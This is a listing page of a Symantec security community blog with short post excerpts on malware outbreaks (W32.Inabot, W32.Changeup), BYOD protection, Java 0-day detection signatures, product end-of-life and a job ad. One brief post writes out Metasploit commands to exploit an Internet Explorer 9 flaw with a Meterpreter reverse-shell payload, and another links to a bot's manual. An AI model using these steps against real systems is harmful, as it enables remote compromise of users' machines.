Security Community Blog

The Security Community Blog is the perfect place to share short, timely insights including product tips, news and other information relevant to the Security community. Any authenticated Connect member can contribute to this blog.

  • 2
    Created: Brandon Noble 25 Apr 2013

    W32.Inabot - Support Perspective and Battle Plan

    I. BACKGROUND: We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise. It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms. After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb For those of you familiar with W32.Changeup, much of this...
  • 0
    Updated: Duncan Mills 04 Apr 2013

    Using Symantec Protection Suite Enterprise Edition (SPS EE) to protect user-owned tablets and smartphones from Internet threats

    The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security. Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies. Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints. Symantec Web Gateway (SWG) will...
  • 0
    Updated: Vikram Kumar-SAV to SEP 05 Feb 2013

    Evolving Endpoint Security

      Symantec keeps tab on the changing Threat Landscape and incorporates relevant security on its products.Same is the story with SAV to SEP to now SEP 12.. When we had SAV in the market what our customer needed was just a Antivirus to protect their system from downtime..here antivirus was looked more as a Availability facilitator than a core security product..till early 2000. Even though we had SCS (firewall and IPS) seclected people used the other features. Starting from 2006-2007 that was a high rise in malware being created and vulnerabilities being exploited..slowly the trend changed and it all came down to money making malwares.. FakeAntivirus, Downadup, Various Blackmailing Trojans etc..here the audience was not high profile..and SEP 11 very well detect and blocks and does whatever it can..Slowly people started using IPS, ADC and found much more can be done with SEP and they are doing it.. However in last few years there has been...
  • 12
    Updated: Brandon Noble 17 May 2013

    W32.Changeup keeps on giving

    I. BACKGROUND: In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.   II. THREAT DETAILS: When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...
  • 0
    Created: Fabiano.Pessoa 27 Sep 2012

    Vulnerability

    Hello We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2 Metasploit: - msfupdate - Use exploit / windows / browser / ie_execcommand_uaf - Set SRVHOST 192,168 ... - Set PAYLOAD windows / Meterpreter / reverse_tcp - Set LHOST 192,168 ... - exploit Let's beware the networking. hugs
  • 7
    Updated: Brandon Noble 30 Aug 2012

    Java 0-Day Coverage

    Greetings everyone. We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle. Current Coverage: 24063 - Web Attack: Malicious Java Download 3 Created prior to the advent of the 0day being used in the wild. This was detecting the Metasploit Exploit Module released for the exploit. 25826 - Web Attack: Blackhole Toolkit Website 30 Also created prior to the 0 Day. This detects BlackHole Toolkits trying to make use of the new vuln as well. ...
  • 0
    Created: Nick Kelly 24 Jul 2011

    Symantec Anti-Virus 10 End-of-Life Announcement.

    Just an FYI if there is still a SAV installation in your environment. Symantec Anti-Virus patch releases and assisted support will be end-of-life next year. For assistance in migrating to SEP, please contact your local account team.  For operating systems and applications not supported by SEP, there are alternative solutions in the Symantec product portfolio that can help protect your environment.   http://www.symantec.com/business/support/index?page=releasedetails&key=51852   SAV 10 original Release Date: 2005-04-27 End of Engineering Support 2012-07-04  (Last date for patch releases) End of Assisted Support 2012-07-04 (Last date to contact support)   Thanks!
  • 0
    Updated: Chad Dupin 01 Jun 2011

    Job Opportunity: Symantec Security Consultant

    ITS Partner is looking to hire a few Symantec Security Consultants / Engineers.   Location West Michigan / Grand Rapids, MI Area. Job Summary This position will be focused on the implementation of Symantec security products within various customer environments. Job responsibilities include assessing customer needs and expectations, designing solutions to meet those needs, and then implementing the design. In addition to these activities the consultant will participate in the sales process (proposal creation, presentations, sales calls, demos, etc.). This position has the opportunity to grow into a leadership role within ITS to help guide and direct the security team. Preferred Technical Qualifications Symantec Endpoint Protection Symantec Endpoint Encryption Symantec Data Loss Prevention Control Compliance Suite PGP Technical Knowledge...
  • 0
    Created: P_K_ 25 Jan 2011

    How is the content downloaded via LU secure?

    How is the content downloaded via LU secure? The Live update TRI files are downloaded in an archive format These minitri’s and livetri.zip files consists of 3 files liveupdt.sig liveupdt.grd liveupdt.tri GRD and SIG files are used to verify security and integrity of patches The Mini-tri Zip is Validated by GRD file and also Authenticated by SIG file The  Guard file use  SHA-1 hash values For Live update the protocols that are used is  HTTP/FTP server. These live update is hosted by Akamai. Published using Java Triage and they are Signed by Symantec Digital Signing Servers.
  • 0
    Created: UCD4me 05 Jan 2011

    Your opportunity to provide usability feedback about security products

    The User Centered Design (UCD) team here at Symantec exists to help make customer experiences easier, more efficient and more useful for you.  Right now, we're ramping up several research projects where we are looking for those in security and compliance with a manger, director or CISO role to give us feedback in the form of short user stories.  This should require only a 30-45 minute commitment on the phone to share experiences and points of pain, and this effort is "product agnostic" so as long as you are involved with security, regardless of products used, we'd like to hear from you!   If you are interested, please email Kellie Mecham at kellie_mecham@symantec.com to arrange a date and time for the phone interview.    We look forward to hearing from you!   Best wishes,   Kellie